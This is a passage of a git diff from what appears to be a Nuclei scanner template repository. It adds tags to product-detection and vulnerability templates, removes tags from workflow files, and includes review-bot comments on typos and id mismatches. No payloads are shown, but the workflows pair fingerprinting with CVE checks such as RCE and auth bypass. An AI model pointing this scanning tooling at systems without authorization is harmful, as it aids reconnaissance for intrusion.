diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml index 0522fc067b..dfb82e44b7 100644 --- a/technologies/home-assistant.yaml +++ b/technologies/home-assistant.yaml @@ -4,6 +4,7 @@ info: name: Detect Home Assistant author: fabaff severity: info + tags: tech,iot requests: - method: GET diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 70f0fc1e8d..6eeff924eb 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -5,6 +5,7 @@ info: author: milo2012 severity: info description: Version of HP iLO + tags: tech,ilo requests: - method: GET diff --git a/technologies/jaspersoft-detect.yaml b/technologies/jaspersoft-detect.yaml index 7cafc9a84d..e26ad12b3f 100644 --- a/technologies/jaspersoft-detect.yaml +++ b/technologies/jaspersoft-detect.yaml @@ -4,6 +4,7 @@ info: name: Jaspersoft detected author: koti2 severity: info + tags: tech,jaspersoft requests: - method: GET diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml index ae031c20ca..9b31eaed43 100644 --- a/technologies/jellyfin-detect.yaml +++ b/technologies/jellyfin-detect.yaml @@ -4,6 +4,7 @@ info: name: Jellyfin detected author: dwisiswant0 severity: info + tags: tech,jellyfin requests: - method: GET @@ -13,6 +14,8 @@ requests: - "{{BaseURL}}/index.html" - "{{BaseURL}}/web/index.html" - "{{BaseURL}}/web/manifest.json" + + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -22,6 +25,7 @@ requests: - "The Free Software Media System" condition: or part: body + - type: status status: - 200 diff --git a/technologies/jolokia.yaml b/technologies/jolokia.yaml index f6b28ff6ad..957b898273 100644 --- a/technologies/jolokia.yaml +++ b/technologies/jolokia.yaml @@ -4,11 +4,13 @@ info: name: Jolokia Version Disclosure author: mavericknerd,dwisiswant0 severity: info + tags: tech,jolokia requests: - method: GET path: - '{{BaseURL}}/jolokia/version' + matchers-condition: and matchers: - type: word 
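Review bot: `tags: tech,iot` carries no product tag, while every other detection template in this patch gets one (`tech,kibana`, `tech,harbor`, `tech,ilo`), so `-tags home-assistant` will never select it; suggest `tags: tech,iot,home-assistant`. Tags are the only selector this series is building, so a template without a product tag is effectively unreachable by name.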
@@ -17,6 +19,7 @@ requests: - '"protocol":' - '"agent":' condition: and + - type: status status: - 200 diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml index c35b4dd301..c64939b6df 100644 --- a/technologies/kibana-detect.yaml +++ b/technologies/kibana-detect.yaml @@ -4,6 +4,7 @@ info: name: Kibana Service Detection author: petruknisme severity: info + tags: tech,kibana requests: - method: GET diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index 6164d7c1cd..39e4d58bb7 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: The Cloud-Native API Gateway - https://github.com/Kong/kong severity: info + tags: tech,kong requests: - method: GET diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml index ebf42ab88b..2a8de63c94 100644 --- a/technologies/liferay-portal-detect.yaml +++ b/technologies/liferay-portal-detect.yaml @@ -1,9 +1,11 @@ id: liferay-portal-detect + info: name: Liferay Portal Detection author: organiccrap,dwisiswant0 severity: info reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE + tags: tech,liferay requests: - method: GET diff --git a/technologies/linkerd-badrule-detect.yaml b/technologies/linkerd-badrule-detect.yaml index 5e445af239..0e1ef8ff57 100644 --- a/technologies/linkerd-badrule-detect.yaml +++ b/technologies/linkerd-badrule-detect.yaml @@ -1,15 +1,11 @@ id: linkerd-badrule-detect -# Detect the Linkerd service by overriding the delegation table with an invalid -# rule, the presence of the service is indicated by either: -# - a "Via: .. linkerd .." -# - a "l5d-err" and/or a "l5d-success" header -# - a literal error in the body - info: name: Linkerd detection via bad rule author: dudez severity: info + tags: tech,linkerd + reference: https://linkerd.io requests: - method: GET 
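Review bot: The removed header comment was the only place documenting how this detection works (an invalid delegation-table rule, matched by a `Via: ... linkerd ...` header, an `l5d-err`/`l5d-success` header, or a literal error in the body), and the new `reference: https://linkerd.io` does not replace it. Move that text into the info block as `description: Detects Linkerd by overriding the delegation table with an invalid rule; presence is indicated by a "Via: ... linkerd ..." header, an "l5d-err" or "l5d-success" header, or a literal error in the response body.` The request and matchers continue past the hunk, so I cannot confirm all three signals are still matched.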
diff --git a/technologies/lotus-domino-version.yaml b/technologies/lotus-domino-version.yaml index 3af4529ee9..897d6fad2e 100644 --- a/technologies/lotus-domino-version.yaml +++ b/technologies/lotus-domino-version.yaml @@ -1,8 +1,10 @@ id: lotus-domino-version + info: name: Lotus Domino Version Extractor author: CasperGN severity: info + tags: tech,lotus requests: - method: GET path: diff --git a/technologies/metabase-detect.yaml b/technologies/metabase-detect.yaml index 2b8c4cec7d..3a865ab0e7 100644 --- a/technologies/metabase-detect.yaml +++ b/technologies/metabase-detect.yaml @@ -1,13 +1,17 @@ id: metabase-version-detect + info: name: Detect Metabase Version author: revblock description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source severity: info + tags: tech,metabase + requests: - method: GET path: - "{{BaseURL}}/auth/login" + matchers-condition: and matchers: diff --git a/technologies/mrtg-detect.yaml b/technologies/mrtg-detect.yaml index 19a062f6fa..96f95f15d6 100644 --- a/technologies/mrtg-detect.yaml +++ b/technologies/mrtg-detect.yaml @@ -1,9 +1,11 @@ id: mrtg-detect + info: name: Detect MRTG author: geeknik description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ severity: info + tags: tech,mrtg requests: - method: GET diff --git a/technologies/netsweeper-webadmin-detect.yaml b/technologies/netsweeper-webadmin-detect.yaml index cc107c6ddc..04b545b315 100644 --- a/technologies/netsweeper-webadmin-detect.yaml +++ b/technologies/netsweeper-webadmin-detect.yaml @@ -4,6 +4,7 @@ info: name: Netsweeper WebAdmin detected author: dwisiswant0 severity: info + tags: tech,netsweeper requests: - method: GET diff --git a/technologies/nginx-version.yaml b/technologies/nginx-version.yaml index 9674f616ed..302d5d3d19 100644 --- a/technologies/nginx-version.yaml +++ b/technologies/nginx-version.yaml 
@@ -1,9 +1,12 @@ id: nginx-version + info: name: nginx version detect author: philippedelteil description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets. severity: info + tags: tech,nginx + requests: - method: GET path: diff --git a/technologies/nifi-detech.yaml b/technologies/nifi-detech.yaml index 8e593cc440..837e4c43fd 100644 --- a/technologies/nifi-detech.yaml +++ b/technologies/nifi-detech.yaml @@ -4,6 +4,7 @@ info: name: Apache NiFi detect author: dwisiswant0 severity: info + tags: tech,apache,nifi requests: - method: GET @@ -15,6 +16,7 @@ requests: - "{{BaseURL}}/flow/registries" - "{{BaseURL}}/system-diagnostics" - "{{BaseURL}}/nifi-api/access/config" + matchers-condition: and matchers: - type: regex @@ -22,6 +24,7 @@ requests: - "supportsLogin" - "disconnectedNodeAcknowledged" - "(aggregate|node)Snapshots?" + - type: status status: - 200 diff --git a/technologies/oidc-detect.yaml b/technologies/oidc-detect.yaml index d8f65083d7..f87bf320d2 100644 --- a/technologies/oidc-detect.yaml +++ b/technologies/oidc-detect.yaml @@ -1,9 +1,11 @@ id: oidc-detect + info: name: Detect OpenID Connect provider author: jarijaas severity: info description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect + tags: tech,oidc requests: - method: GET diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml index b3c603dde0..fd1653f20f 100644 --- a/technologies/openam-detection.yaml +++ b/technologies/openam-detection.yaml @@ -4,6 +4,7 @@ info: name: Detect OpenAM and OpenSSO author: philippedelteil severity: info + tags: tech,openam requests: - method: GET diff --git a/technologies/pi-hole-detect.yaml b/technologies/pi-hole-detect.yaml index 0f5cbcb052..22d1a56dca 100644 --- a/technologies/pi-hole-detect.yaml +++ b/technologies/pi-hole-detect.yaml 
@@ -1,8 +1,10 @@ id: pi-hole-detect + info: name: pi-hole detector author: geeknik severity: info + tags: tech,pihole requests: - method: GET @@ -14,6 +16,7 @@ requests: - type: status status: - 200 + - type: word words: - "Pi-hole" diff --git a/technologies/prtg-detect.yaml b/technologies/prtg-detect.yaml index c57d90484d..c630eff289 100644 --- a/technologies/prtg-detect.yaml +++ b/technologies/prtg-detect.yaml @@ -1,9 +1,11 @@ id: prtg-detect + info: name: Detect PRTG author: geeknik description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg severity: info + tags: tech,prtg requests: - method: GET diff --git a/technologies/redmine-cli-detect.yaml b/technologies/redmine-cli-detect.yaml index 24a02349aa..8cb08b7888 100644 --- a/technologies/redmine-cli-detect.yaml +++ b/technologies/redmine-cli-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ severity: info + tags: tech,redmine requests: - method: GET diff --git a/technologies/s3-detect.yaml b/technologies/s3-detect.yaml index fe617373af..3ed37bb68e 100644 --- a/technologies/s3-detect.yaml +++ b/technologies/s3-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info + tags: aws,s3,bucket,tech requests: - method: GET diff --git a/technologies/shiro-detect.yaml b/technologies/shiro-detect.yaml index 321f556a03..8353c48494 100644 --- a/technologies/shiro-detect.yaml +++ b/technologies/shiro-detect.yaml @@ -1,16 +1,20 @@ id: shiro-detect + info: name: Detect Shiro Framework author: AresX severity: info + tags: tech,shiro + requests: - method: GET path: - '{{BaseURL}}' headers: Cookie: rememberMe=123; + matchers: - type: word words: - - rememberMe=deleteMe + - 'rememberMe=deleteMe' part: header \ No newline at end of file 
diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml index 6bc4c9e7a1..ebc7edbe1e 100644 --- a/technologies/springboot-actuator.yaml +++ b/technologies/springboot-actuator.yaml @@ -4,13 +4,17 @@ info: name: Detect Springboot Actuators author: that_juan_,dwisiswant0,wdahlenb severity: info + tags: tech,springboot,actuator requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/actuator" - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/actuator/favicon.ico" + stop-at-first-match: true matchers-condition: or matchers: - type: word diff --git a/technologies/sql-server-reporting.yaml b/technologies/sql-server-reporting.yaml index 5b08ec1032..4b64c61e6f 100644 --- a/technologies/sql-server-reporting.yaml +++ b/technologies/sql-server-reporting.yaml @@ -4,6 +4,7 @@ info: name: Detect Microsoft SQL Server Reporting author: puzzlepeaches severity: info + tags: tech,micrsoft requests: - method: GET diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik-fileupload-detect.yaml index 810cef7a8b..8f150d8b40 100644 --- a/technologies/telerik-fileupload-detect.yaml +++ b/technologies/telerik-fileupload-detect.yaml @@ -4,11 +4,13 @@ info: name: Detect Telerik Web UI fileupload handler author: organiccrap severity: info + tags: tech,telerik requests: - method: GET path: - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" + matchers: - type: word words: diff --git a/technologies/terraform-detect.yaml b/technologies/terraform-detect.yaml index 8c4d3307df..4a458c77e2 100644 --- a/technologies/terraform-detect.yaml +++ b/technologies/terraform-detect.yaml @@ -1,9 +1,11 @@ id: terraform-detect + info: name: Detect Terraform Provider author: geeknik description: Write Infrastructure as Code - https://www.terraform.io/ severity: info + tags: tech,terraform requests: - method: GET diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml index d5a164932d..5561dba63d 100644 
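Review bot: The new tag `micrsoft` is misspelled, so `-tags microsoft` will never select this template; change the line to `tags: tech,microsoft`. This is the only template in the patch using that spelling, and tag selection is exact-match, so the typo silently drops the template from any Microsoft-scoped run.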
--- a/technologies/tomcat-detect.yaml +++ b/technologies/tomcat-detect.yaml @@ -1,10 +1,12 @@ -id: tomcat-version-detect +id: tomcat-version + info: name: Detect Tomcat Version author: philippedelteil - description: If an Tomcat instance is deployed on the target URL, when we send a request for - a non existent resource we receive a Tomcat error page with version. + description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. severity: info + tags: tech,tomcat,apache + requests: - method: GET path: diff --git a/technologies/tor-socks-proxy.yaml b/technologies/tor-socks-proxy.yaml index ddbe880309..4957f092b8 100644 --- a/technologies/tor-socks-proxy.yaml +++ b/technologies/tor-socks-proxy.yaml @@ -1,8 +1,10 @@ id: tor-socks-proxy + info: name: Detect tor SOCKS proxy author: geeknik severity: info + tags: tech,tor,proxy requests: - method: GET diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml index 6d290ac6f8..4effb62c55 100644 --- a/technologies/weblogic-detect.yaml +++ b/technologies/weblogic-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Weblogic author: bing0o severity: info + tags: tech,weblogic requests: - method: GET diff --git a/technologies/werkzeug-debugger-detect.yaml b/technologies/werkzeug-debugger-detect.yaml index f11eac5435..aa90f4c1a3 100644 --- a/technologies/werkzeug-debugger-detect.yaml +++ b/technologies/werkzeug-debugger-detect.yaml @@ -4,6 +4,7 @@ info: name: Werkzeug debugger console author: pdteam severity: info + tags: tech,werkzeug requests: - method: GET diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 3f04c30a27..56b6d5f00f 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml 
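Review bot: The `id` is renamed from `tomcat-version-detect` to `tomcat-version`, which still does not match the filename `tomcat-detect.yaml` and will presumably break any workflow or `-id`/exclusion list that referenced the old id; either keep the old id or rename the file so the two agree. The reflowed description also keeps the grammatical slip; suggest `description: If a Tomcat instance is deployed on the target URL, a request for a non-existent resource returns a Tomcat error page containing the version.`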
@@ -8,6 +8,7 @@ info: reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt + tags: rce,listserv,ognl requests: - method: GET diff --git a/vulnerabilities/other/cacti-weathermap-file-write.yaml b/vulnerabilities/other/cacti-weathermap-file-write.yaml index b8ebf42adb..04a5d1b654 100644 --- a/vulnerabilities/other/cacti-weathermap-file-write.yaml +++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: medium reference: https://www.freebuf.com/articles/system/125177.html + tags: injection,cacti requests: - method: GET diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml index f4fa330ad9..04795427db 100644 --- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: info reference: https://www.exploit-db.com/exploits/27888 + tags: exposure,resin requests: - method: GET diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml index 062d1759ab..a62783f871 100644 --- a/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDk severity: high reference: https://www.exploit-db.com/exploits/49054 + tags: lfi,pmb requests: - method: GET diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index d0dcd358f6..6f612b4f78 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: high reference: https://www.exploit-db.com/exploits/48877 - + tags: auth-bypass requests: - raw: - | 
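Review bot: In the vpms-auth-bypass hunk the removed line is the blank separator between `info:` and `requests:` and the added `tags: auth-bypass` takes its place, which leaves this file without the blank line every other template in this commit keeps; the tag list also omits the product name, whereas the sibling zms template in the next hunk gets `auth-bypass,zms`. Suggest `tags: auth-bypass,vpms` and restoring the blank line so the two auth-bypass templates stay parallel and tag-based selection by product works for both.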
diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index fbc1e03821..65c7df9984 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -5,6 +5,7 @@ info: author: dwisiswant0 severity: high reference: https://www.exploit-db.com/exploits/48880 + tags: auth-bypass,zms requests: - raw: From 8b36cf0f863818fb553ca7f2372dea63368d3da5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 9 Sep 2021 19:14:14 +0530 Subject: [PATCH 123/339] workflow tags cleanup as it's not supported at workflow level --- workflows/aem-workflow.yaml | 1 - workflows/airflow-workflow.yaml | 1 - workflows/artica-web-proxy-workflow.yaml | 6 ------ workflows/azkaban-workflow.yaml | 2 -- workflows/bigip-workflow.yaml | 6 ------ workflows/cacti-workflow.yaml | 2 -- workflows/cisco-asa-workflow.yaml | 6 ------ workflows/cockpit-workflow.yaml | 1 - workflows/dell-idrac-workflow.yaml | 1 - workflows/gitlab-workflow.yaml | 2 -- workflows/grafana-workflow.yaml | 2 -- workflows/harbor-workflow.yaml | 2 -- workflows/jellyfin-workflow.yaml | 1 - workflows/jira-workflow.yaml | 2 -- workflows/liferay-workflow.yaml | 5 ----- workflows/lotus-domino-workflow.yaml | 5 ----- workflows/lucee-workflow.yaml | 1 - workflows/magento-workflow.yaml | 1 - workflows/magmi-workflow.yaml | 6 ------ workflows/mida-eframework-workflow.yaml | 5 ----- workflows/netsweeper-workflow.yaml | 6 ------ workflows/phpmyadmin-workflow.yaml | 1 - workflows/rabbitmq-workflow.yaml | 5 ----- workflows/sap-netweaver-workflow.yaml | 1 - workflows/solarwinds-orion-workflow.yaml | 4 ---- workflows/springboot-workflow.yaml | 5 ----- workflows/thinkcmf-workflow.yaml | 2 -- workflows/thinkphp-workflow.yaml | 2 -- workflows/vbulletin-workflow.yaml | 6 ------ workflows/weblogic-workflow.yaml | 2 -- workflows/wordpress-workflow.yaml | 1 - 31 files changed, 93 deletions(-) 
diff --git a/workflows/aem-workflow.yaml b/workflows/aem-workflow.yaml index ff8f7019c7..6ef96d04c9 100644 --- a/workflows/aem-workflow.yaml +++ b/workflows/aem-workflow.yaml @@ -4,7 +4,6 @@ info: name: Adobe Experience Manager Security Checks author: dhiyaneshDK description: A simple workflow that runs all Adobe Experience Manager related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/aem-detection.yaml diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index 8a5a9164e8..1408a62b69 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -4,7 +4,6 @@ info: name: Apache Airflow Security Checks author: pdteam description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target. - tags: workflow workflows: diff --git a/workflows/artica-web-proxy-workflow.yaml b/workflows/artica-web-proxy-workflow.yaml index 8fee7fe758..ed4ba17f87 100644 --- a/workflows/artica-web-proxy-workflow.yaml +++ b/workflows/artica-web-proxy-workflow.yaml @@ -4,14 +4,8 @@ info: name: Artica Web Proxy Security Checks author: dwisiswant0,pdteam description: A simple workflow that runs all Artica Web Proxy related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/artica-web-proxy-detect.yaml - subtemplates: - template: cves/2020/CVE-2020-17505.yaml \ No newline at end of file diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml index 944c6b04b2..0fb56f4451 100644 --- a/workflows/azkaban-workflow.yaml +++ b/workflows/azkaban-workflow.yaml 
@@ -4,10 +4,8 @@ info: name: Azkaban Security Checks author: pdteam description: A simple workflow that runs all Azkaban related nuclei templates on a given target. - tags: workflow workflows: - - template: exposed-panels/azkaban-web-client.yaml subtemplates: - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml diff --git a/workflows/bigip-workflow.yaml b/workflows/bigip-workflow.yaml index 315999a816..2e3b152ede 100644 --- a/workflows/bigip-workflow.yaml +++ b/workflows/bigip-workflow.yaml @@ -4,14 +4,8 @@ info: name: F5 BIG-IP Security Checks author: dwisiswant0 description: A simple workflow that runs all BigIP related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/bigip-config-utility-detect.yaml - subtemplates: - template: cves/2020/CVE-2020-5902.yaml diff --git a/workflows/cacti-workflow.yaml b/workflows/cacti-workflow.yaml index 8e2a673caf..7810865c26 100644 --- a/workflows/cacti-workflow.yaml +++ b/workflows/cacti-workflow.yaml @@ -6,8 +6,6 @@ info: description: A simple workflow that runs all Cacti related nuclei templates on a given target. workflows: - - template: technologies/cacti-detect.yaml - subtemplates: - template: vulnerabilities/other/cacti-weathermap-file-write.yaml \ No newline at end of file diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index 455eb68e1c..4c864a33d5 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml 
@@ -4,15 +4,9 @@ info: name: Cisco ASA Security Checks author: flag007 description: A simple workflow that runs all Cisco related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: exposed-panels/cisco-asa-panel.yaml - subtemplates: - template: cves/2020/CVE-2020-3187.yaml - template: cves/2020/CVE-2020-3452.yaml diff --git a/workflows/cockpit-workflow.yaml b/workflows/cockpit-workflow.yaml index 1771944bf3..8e3bdc14c2 100644 --- a/workflows/cockpit-workflow.yaml +++ b/workflows/cockpit-workflow.yaml @@ -4,7 +4,6 @@ info: name: Agentejo Cockpit Security Checks author: dwisiswant0 description: A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/cockpit-detect.yaml diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index e7385e0602..bdf4e83b20 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml @@ -3,7 +3,6 @@ info: name: Dell iDRAC Security Checks author: kophjager007 description: A workflow to identify Dell iDRAC instances and run all related nuclei templates. - tags: workflow workflows: - template: technologies/dell/dell-idrac6-detect.yaml diff --git a/workflows/gitlab-workflow.yaml b/workflows/gitlab-workflow.yaml index c05d54cad2..ef6b650224 100644 --- a/workflows/gitlab-workflow.yaml +++ b/workflows/gitlab-workflow.yaml @@ -4,10 +4,8 @@ info: name: GitLab Security Checks author: pdteam description: A simple workflow that runs all GitLab related nuclei templates on a given target. - tags: workflow workflows: - - template: exposed-panels/gitlab-detect.yaml subtemplates: - tags: gitlab \ No newline at end of file 
diff --git a/workflows/grafana-workflow.yaml b/workflows/grafana-workflow.yaml index 6bff88bb5f..1a2240d48e 100644 --- a/workflows/grafana-workflow.yaml +++ b/workflows/grafana-workflow.yaml @@ -4,10 +4,8 @@ info: name: Grafana Security Checks author: pdteam description: A simple workflow that runs all Grafana related nuclei templates on a given target. - tags: workflow workflows: - template: exposed-panels/grafana-detect.yaml - subtemplates: - tags: grafana diff --git a/workflows/harbor-workflow.yaml b/workflows/harbor-workflow.yaml index d99c9482a2..49003135e7 100644 --- a/workflows/harbor-workflow.yaml +++ b/workflows/harbor-workflow.yaml @@ -4,10 +4,8 @@ info: name: Harbor Security Checks author: pikpikcu description: A simple workflow that runs all Harbor related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/harbor-detect.yaml subtemplates: - template: cves/2019/CVE-2019-16097.yaml \ No newline at end of file diff --git a/workflows/jellyfin-workflow.yaml b/workflows/jellyfin-workflow.yaml index 5023290961..126b6dbc0e 100644 --- a/workflows/jellyfin-workflow.yaml +++ b/workflows/jellyfin-workflow.yaml @@ -3,7 +3,6 @@ info: name: Jellyfin Security Checks author: dwisiswant0 description: A simple workflow that runs all Jellyfin related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/jellyfin-detect.yaml diff --git a/workflows/jira-workflow.yaml b/workflows/jira-workflow.yaml index 52dc245749..28c138f0b4 100644 --- a/workflows/jira-workflow.yaml +++ b/workflows/jira-workflow.yaml @@ -4,10 +4,8 @@ info: name: Jira Security Checks author: micha3lb3n description: A simple workflow that runs all Jira related nuclei templates on a given target. - tags: workflow workflows: - - template: exposed-panels/jira-detect.yaml subtemplates: - tags: jira \ No newline at end of file diff --git a/workflows/liferay-workflow.yaml b/workflows/liferay-workflow.yaml index be0612de56..822022a83a 100644 
--- a/workflows/liferay-workflow.yaml +++ b/workflows/liferay-workflow.yaml @@ -4,13 +4,8 @@ info: name: Liferay Security Checks author: dwisiswant0 description: A simple workflow that runs all liferay related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/liferay-portal-detect.yaml subtemplates: - template: cves/2020/CVE-2020-7961.yaml \ No newline at end of file diff --git a/workflows/lotus-domino-workflow.yaml b/workflows/lotus-domino-workflow.yaml index 58b07e209a..826d85b7a9 100644 --- a/workflows/lotus-domino-workflow.yaml +++ b/workflows/lotus-domino-workflow.yaml @@ -4,13 +4,8 @@ info: name: Lotus Domino Security Checks author: CasperGN description: A simple workflow that runs all Lotus Domino related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/tech-detect.yaml matchers: - name: lotus-domino diff --git a/workflows/lucee-workflow.yaml b/workflows/lucee-workflow.yaml index 3499322be0..1fff72dadc 100644 --- a/workflows/lucee-workflow.yaml +++ b/workflows/lucee-workflow.yaml @@ -4,7 +4,6 @@ info: name: Lucee Detection Workflow author: geeknik,dhiyaneshDk description: A simple workflow that runs all Lucee related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/lucee-detect.yaml diff --git a/workflows/magento-workflow.yaml b/workflows/magento-workflow.yaml index c7c30b1456..24e15e9433 100644 --- a/workflows/magento-workflow.yaml +++ b/workflows/magento-workflow.yaml 
@@ -4,7 +4,6 @@ info: name: Magento Security Checks author: TechbrunchFR description: A simple workflow that runs all Magento related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/magento-detect.yaml diff --git a/workflows/magmi-workflow.yaml b/workflows/magmi-workflow.yaml index 4e88637219..302bd59248 100644 --- a/workflows/magmi-workflow.yaml +++ b/workflows/magmi-workflow.yaml @@ -4,15 +4,9 @@ info: name: MAGMI Security Checks author: dwisiswant0 description: A simple workflow that runs all MAGMI related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/magmi-detect.yaml - subtemplates: - template: cves/2017/CVE-2017-7391.yaml - template: cves/2020/CVE-2020-5776.yaml diff --git a/workflows/mida-eframework-workflow.yaml b/workflows/mida-eframework-workflow.yaml index bed58d312c..ab7579cd7a 100644 --- a/workflows/mida-eframework-workflow.yaml +++ b/workflows/mida-eframework-workflow.yaml @@ -4,13 +4,8 @@ info: name: Mida eFramework Security Checks author: CasperGN description: A simple workflow that runs all Mida eFramework related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/tech-detect.yaml matchers: - name: mida-eframework diff --git a/workflows/netsweeper-workflow.yaml b/workflows/netsweeper-workflow.yaml index a982fc1989..22405a1d70 100644 --- a/workflows/netsweeper-workflow.yaml +++ b/workflows/netsweeper-workflow.yaml 
@@ -4,14 +4,8 @@ info: name: Netsweeper Security Checks author: dwisiswant0 description: A simple workflow that runs all netsweeper related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/netsweeper-webadmin-detect.yaml - subtemplates: - template: cves/2020/CVE-2020-13167.yaml \ No newline at end of file diff --git a/workflows/phpmyadmin-workflow.yaml b/workflows/phpmyadmin-workflow.yaml index 49f8d008d5..68ca23dc37 100644 --- a/workflows/phpmyadmin-workflow.yaml +++ b/workflows/phpmyadmin-workflow.yaml @@ -4,7 +4,6 @@ info: name: phpmyadmin-workflow author: philippedelteil description: A workflow that runs all PhpMyAdmin related nuclei templates on a given target - tags: workflow workflows: - template: exposed-panels/phpmyadmin-panel.yaml diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml index 9f4f182974..c5fc2b4324 100644 --- a/workflows/rabbitmq-workflow.yaml +++ b/workflows/rabbitmq-workflow.yaml @@ -4,13 +4,8 @@ info: name: RabbitMQ Security Checks author: fyoorer description: A simple workflow that runs all rabbitmq related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: exposed-panels/rabbitmq-dashboard.yaml subtemplates: diff --git a/workflows/sap-netweaver-workflow.yaml b/workflows/sap-netweaver-workflow.yaml index 